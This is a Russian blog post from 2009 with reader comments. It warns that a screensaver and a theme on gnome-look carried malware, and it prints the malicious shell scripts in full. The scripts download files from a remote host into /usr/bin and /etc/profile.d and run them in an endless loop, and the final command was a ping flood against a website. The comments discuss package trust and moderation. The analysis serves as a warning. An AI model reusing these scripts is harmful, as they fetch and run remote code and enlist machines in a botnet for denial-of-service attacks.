|
09.12.09 22:36
За последние 2 дня на gnome-look обнаружено уже 2 пакета содержащие вредоносные скрипты
скринсейвер WaterFall и тема оформления Ninja
скрипт:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit |
содержание скрипта Auto.bash
1
2
3
4
5
6
7
8
9
10
11
|
while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done |
видимо таким незатейливым способом автор сего безобразия планировал управлять бот-сетью )
в конечном итоге выполнялась команда:
ping -s 65507 www.mmowned.com
Будьте осторожны загружая неизвестное по.
-
Простая как 3 копейки идея, только автор площадку для распространения плохую нашёл..
-
Вот правильно говорят, нечего в рот всякую гадость тащить. Особенно темы в формате deb неизвестна откуда :) а так идея уже давно обкатана. Такого будет больше ибо хомячку все-равно - ему попроси ввести пароль рута что бы рейтинг вконтакте увеличить так и введет без какой либо задней мысли. И никакая защита от таких не спасет :)
-
-
Как же хомячку узнать, что в данной теме или скринсейвере есть эта бяка? Не все йогурты одинаково полезны, но есть же "хорошие" для вкусной и здоровой пищи.
-
-
Не покупать йогурт, кушать кашку)
-
-
Я подумал об этом раньше, но не сделал, надо было сразу подстраховаться - я никого в этом топике не минусовал. :)
-
в скринсейверах обычно нету как минимум башскриптов (хотя хз, не пользовался ими никогда так что про них не скажу), а темы ставятся под пользователям тупо распаковав тему в ~/.themes (дада, там тоже нету никаких скриптов) - а те что не из репов непонятные ставить с правами рута как минимум глупо пока их не исследовал хоть по минимуму (а для этого как известно нужны какие-нить навыки, но хомячек их не имеет иначе был бы уже не хомячком). и если хомяк не может сиед дело сам осознать пусть завет на помощь антивирус и спеца которые настроит ему ОС "под ключ"
-
-
в .deb пакетах есть мейнтейнерские скрипты куда запихать можно что угодно да и проблема с рутом решена. а копать пакет, не каждый "хомячок" знает что в него вобще можно заглянуть. антивирус в данном случае тоже не помошник.
в конечном итоге все строится на доверии конкретному ресурсу/человеку.
да, и хомячок пользователь злейший враг безопасности своего ПК.
-
По-моему, Вы рано называете пользователей opendesktop хомячками. Этому сайту доверяли :)
А Вы пользуетесь только подписанными пакетами, а если что-то собираете из исходников - проводите предварительный анализ кода?
-
-
По-моему, Вы рано называете пользователей opendesktop хомячками. Этому сайту доверяли :)
как можно доверять сайту который не хранит у себя темы а дает линки в другое место? Хотя да, сайту доверять можно а вот тем куда ведут линки не всегда =)
А Вы пользуетесь только подписанными пакетами
нет, просто из офф.репы качаю доверяясь авторам дистра и мейнтейнерам используемых программ
а если что-то собираете из исходников - проводите предварительный анализ кода?
можете назвать мну параноиком, но там где я на это способен - да, но в какой-то момент появляется доверие к автору-мейнтейнеру и я перестаю это делать. а там где неспособен то конечно нет, поэтому там приходится жить на доверии к авторитету программы/автору(ам)/мейнтейнеру/и т.д. но это доверие надо заработать, ибо мимо пролетающим обычно доверие минимально
-
-
ну согласись, что доверия если нет, то прога мало известна, и врядли ты ею будешь пользоваться. Так что ты все правильно выше сказал.
-
-
в большинстве случаев именно так.
-
muhas, скажи мне как старый кулхацкер и заслуженный арчевод - ты на AURе подобной фигни не видел?
-
-
нет. не видел. но посмотрел бы на реакцию арчеводов после нахождения (ибо запихать никто не мешает, ведь никакой модерации нет)
-
-
а реакция будет такая :
1. все возмущены
2. аарон обращается в травмпункт с сотрясением средней тяжести
3. арч становится стабильнее слаки, все пакеты в экстре и ауре проверенные-перепроверенные )))
-
-
скорее всего тупо введут премодерацию в ауре =)
а мож просто доп метки какие-нить. хотя почти на всех пакетах в ауре пишется что то типо буть бдительней %username%, возможно ты собрался ставить лажу
-
-
так задалбывает сидеть и жать N при запросе на редактирование PKGBUILD во время yaourt -Suy --aur, чесслово. Лучше бы премодерацию ввели.
-
-
Отруби запрос.
vim /etc/yaourtrc, Luck.
-
Из исходников собирают, того чего нет в репах, но очень нужно, что в большинстве случаев уже говорит, вы ставите программу(скрипт или еще чего-то) то что вам надо, значит про нее знаете. И да без анализа ты даже поставить не сможешь, те же зависимости надо знать. А темы и всякие блестяшки никто из исходников не ставит. Вернее ставят, но тот кто реально не понимает не то что в линуксе, а вообще в любой ОС и компах. Вот из-за таких ... будет больше и больше такой фигни, и проверять скоро надо будет и серьезные программы.
-
-
>И да без анализа ты даже поставить не сможешь, те же зависимости надо знать
Вы, похоже, никогда не ставили программу из исходников, а уже говорите что-то об анализе :)
В 99% случаев зависимости описаны разработчиком в INSTALL или README
-
-
конечно нет, потому я сижу на генте и у меня не одним свой ебилд. просто под анализом, я не имею ввиду копание в коде(иногда его так много, да и не все поймешь), а имею ввиду ознакомление с офф.сайтом, описание программы, форумом поддержки, каналом на фриноде, поиске на багзиле генты уже готовых ебилдов. И уже тогда решаю, серьезные люди пишут и поддерживают программу, известна ли она и так далее
-
Вирусом эт не назвать) так что не вирь.... Тупо чел собрал бот сеть) и скарее всего простой скрипткидис, прочитавший мануалы про башии поторчавший на damagelab.org
-
-
да тут и манов читать не надо.
-
ох уж этот ваш опенсурс
-
-
Если бы было не open-source, чувак бы ботсеть собрал.
-
-
а он и так себе малость собрал, не все же из тех кто попался до сих пор в курсе что у них левые скрипты работают =)
-
-
Таки вы думаете что он сейчас в состоянии ей воспользоваться?
-
-
ну не в полном объеме что хотелось, но думаю немного поюзал хоть для пробы =)
-
На самом деле это отвлекающий маневр.
И на текущий момент 83% пользователей deb-based дистрибутивов находятся в крупнейшем linux ботнете. Информация получена, конечно же, из достоверного источника, который захотел остаться неизвестным.
-
-
Вы забыли теги [sarcasm], кэп! :D
-
инфа сколько процентов?
-
Определённо там забыта точка.
|
|
|
  |
|
Последние посты
|
|
|
Последние комментарии
|
|
|
Изменения
|
   |
|
Черновики (все)
|
|
|
Избранное (всё)
|
|
|
hayao — Вредоносные скрипты на gnome-look
